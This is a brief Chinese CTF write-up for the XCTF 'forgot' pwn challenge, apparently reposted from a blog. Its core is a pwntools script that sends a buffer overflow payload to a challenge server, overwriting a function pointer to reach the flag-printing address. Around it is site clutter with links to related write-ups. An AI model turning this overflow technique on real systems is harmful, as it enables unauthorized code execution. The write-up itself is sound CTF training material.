XCTF forgot write up

其他 2019-10-24 00:50:50 阅读次数: 0

nc 一下给的地址和端口号，大概这个样子。

看一下源文件什么样子。

这是第一个溢出点，里面没什么东西。

第二个溢出点。

距离32的地方，有个0x54的函数指针

exp：

from pwn import *

context.log_level = 'debug'
c = remote("111.198.29.45", 52335)

payload = 'a'*0x44 + p32(0x080486CC) + 'a'*0x20 + p32(0x8)

c.recvuntil(">")
c.sendline("bbb")

c.sendlineafter("> ", payload)

c.interactive()

喜提flag。

猜你喜欢

转载自www.cnblogs.com/mzstar/p/11729887.html

XCTF forgot write up

XCTF warmup write up

xctf - forgot

XCTF hello_pwn write up

XCTF level0 write up

XCTF level3 write up

xctf攻防世界web新手练习区--write up

XCTF when_did_you_born write up

攻防世界(XCTF)WEB(进阶区)write up(一)

攻防世界(XCTF)WEB(进阶区)write up(四)

XCTF(攻防世界)—进阶web题Write Up(二)

XCTF(攻防世界)—进阶web题Write Up(一)

Write-up-Toppo

Write-up-Violator

write up社工进阶

write up 杂项：telenet

Jarvis OJ FindKey Write Up

SCTF simple Write Up Reverse

Hello Write Up DDCTF 2017

FindPass Write Up Jarvis OJ

Jarvis OJ Smali Write Up

Wechall.No_Escape write up

实验吧 recursive write up

Write-up-Bulldog2

Write-up-NODE-1

[Write-up]-Trollcave: 1.2

i春秋 crypto write up

Hackinglab基础关Write Up

DC: 8-Write-up

Write-Up-wakanda-1

今日推荐

LFOSSA 源来如此公开课 | 掌握云原生未来：CNCF 认证全面攻略与备考秘籍

国产云输入法——仅华为无云端数据上传安全问题

开源日报 | 工业开源项目OGG 1.0；姐姐，你要和我一起配置火狐吗；苹果AI遥遥落后？Fedora 40

开放签电子签章：停止新增，优化体验，前进更进（五一假期前工作）

开源日报 | 中学生开源前端动画引擎；全球首个Llama3 8B中文版开源模型；联想电脑恐出局；Linus讽刺AI炒作

“百模大战”必有一战 | 2024中国“百模大战”竞争格局分析

周排行

Family Tree 题解

BZOJ 1093 最大半连通子图 SCC + DP

幂等处理

Spring----学习（2）----XML 配置Bean 自动装配

SQL Server 远程更新目标表数据

HIbernate3.6 环境搭建

特殊符号正则表达式

【Linux】第一章进程的理解

843. n-皇后问题（dfs+输出各种情况）

空间数据库2

每日归档

2024-04-26(39)

2024-04-25(22)

2024-04-24(36)

2024-04-23(26)

2024-04-22(39)

2024-04-21(0)

2024-04-20(6)

2024-04-19(5)

2024-04-18(0)

2024-04-17(5)